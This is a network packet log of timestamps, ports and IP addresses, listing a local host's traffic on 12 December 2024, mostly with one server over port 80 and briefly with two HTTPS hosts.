Dec 12, 2024 16:48:18.023998976 CET	443	49870	216.58.208.238	192.168.2.10
Dec 12, 2024 16:48:18.024051905 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.024075985 CET	49870	443	192.168.2.10	216.58.208.238
Dec 12, 2024 16:48:18.029113054 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.029136896 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.029212952 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.099179029 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.099355936 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.099486113 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.101598978 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.101667881 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.101676941 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.101722956 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.106630087 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.106722116 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.106802940 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.111350060 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.111569881 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.111584902 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.111640930 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.116256952 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.116277933 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.116326094 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.120969057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.121083975 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.121146917 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.125688076 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.125782967 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.125833035 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.130496025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.130605936 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.130652905 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.135345936 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.135524035 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.135576963 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.135621071 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.140146017 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.140345097 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.140405893 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.144869089 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.144999027 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.145051003 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.149554968 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.149676085 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.149729013 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.154474020 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.154702902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.154756069 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.159265041 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.159352064 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.159404039 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.162885904 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.163033962 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.163042068 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.163084030 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.166579962 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.166651964 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.166672945 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:18.166692019 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.166718006 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:18.166785002 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:18.167090893 CET	49878	443	192.168.2.10	172.217.17.65
Dec 12, 2024 16:48:18.167104959 CET	443	49878	172.217.17.65	192.168.2.10
Dec 12, 2024 16:48:18.170291901 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.170424938 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.170485973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.291481972 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.291594982 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.291707039 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.292962074 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.293025970 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.293066025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.293107033 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.295866966 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.295927048 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.295990944 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.296040058 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.298738956 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.298814058 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.298868895 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.298918962 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.301691055 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.301738977 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.301795006 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.301836967 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.304744959 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.304764032 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.304828882 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.307538986 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.307590008 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.307626963 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.307683945 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.310489893 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.310532093 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.310704947 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.311561108 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.313308954 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.313360929 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.313420057 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.313462973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.316214085 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.316320896 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.316366911 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.319181919 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.319243908 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.319267035 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.319309950 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.322022915 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.322120905 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.322175026 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.324959993 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.325005054 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.325031042 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.325190067 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.327871084 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.327999115 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.328057051 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.330794096 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.330856085 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.330895901 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.330939054 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.333652973 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.333725929 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.333883047 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.333930016 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.336571932 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.336626053 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.336682081 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.339493036 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.339562893 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.339603901 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.339656115 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.342390060 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.342443943 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.342489004 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.342535019 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.345319033 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.345432997 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.345474958 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.348303080 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.348370075 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.348407984 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.348457098 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.351172924 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.351278067 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.351317883 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.354141951 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.354279995 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.354300976 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.354343891 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.356987953 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.357033968 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.357100964 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.357144117 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.359931946 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.360008955 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.360070944 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.362802029 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.362864971 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.362907887 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.362951994 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.365746975 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.365787983 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.365840912 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.367573023 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.368668079 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.368714094 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.368777037 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.369024992 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.371552944 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.371601105 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.371659994 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.371710062 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.483648062 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.483717918 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.483803988 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.484313011 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.484369993 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.484527111 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.484575987 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.486960888 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.487008095 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.487078905 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.487123013 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.489569902 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.489712000 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.489763975 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.492007017 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.492074013 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.492125988 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.494664907 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.494718075 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.494723082 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.494762897 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.497356892 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.497529984 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.497580051 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.499622107 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.499685049 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.499737978 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.501951933 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.501997948 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.502037048 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.502083063 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.504338980 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.504462957 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.504514933 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.506793022 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.506913900 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.506969929 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.509175062 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.509222031 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.509239912 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.509287119 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.511588097 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.511924982 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.511971951 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.514022112 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.514080048 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.514478922 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.514530897 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.516473055 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.516767025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.516843081 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.518846035 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.518894911 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.518966913 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.519007921 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.521265030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.521323919 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.521389961 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.521429062 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.523653030 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.523792982 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.523842096 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.526083946 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.526173115 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.526207924 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.526249886 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.528800964 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.529112101 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.529167891 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.530909061 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.530952930 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.531090975 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.531132936 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.533410072 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.533638000 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.533678055 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.535804033 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.535892963 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.535953045 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.538137913 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.538197041 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.538271904 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.538311958 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.540575027 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.540714025 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.540756941 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.543047905 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.543102980 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.543137074 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.543178082 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.545392990 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.545741081 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.545841932 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.547862053 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.547982931 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.548048973 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.550257921 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.550328016 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.550458908 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.550510883 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.552634954 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.552917004 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.552964926 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.555058956 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.555107117 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.555136919 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.555175066 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.557492971 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.557638884 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.557693958 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.559983969 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.560096979 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.560154915 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.562360048 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.562530041 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.562598944 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.564713955 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.564779997 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.564780951 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.564819098 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.567102909 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.567137957 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.567183971 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.567204952 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.569528103 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.569628000 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.569639921 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.569681883 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.571984053 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.572186947 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.572236061 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.574384928 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.574429989 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.574434042 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.574475050 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.576766968 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.576845884 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.576888084 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.579195976 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.579242945 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.579288960 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.581568003 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.581613064 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.581661940 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.583964109 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.584011078 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.584048986 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.586378098 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.586455107 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.586487055 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.586528063 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.588814020 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.588920116 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.588970900 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.591309071 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.591564894 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.591598988 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.591615915 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.593673944 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.593725920 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.593868971 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.595562935 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.596065044 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.596124887 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.596184969 CET	80	49872	31.41.244.11	192.168.2.10
Dec 12, 2024 16:48:18.596230984 CET	49872	80	192.168.2.10	31.41.244.11
Dec 12, 2024 16:48:18.598500967 CET	80	49872	31.41.244.11	192.168.2.10
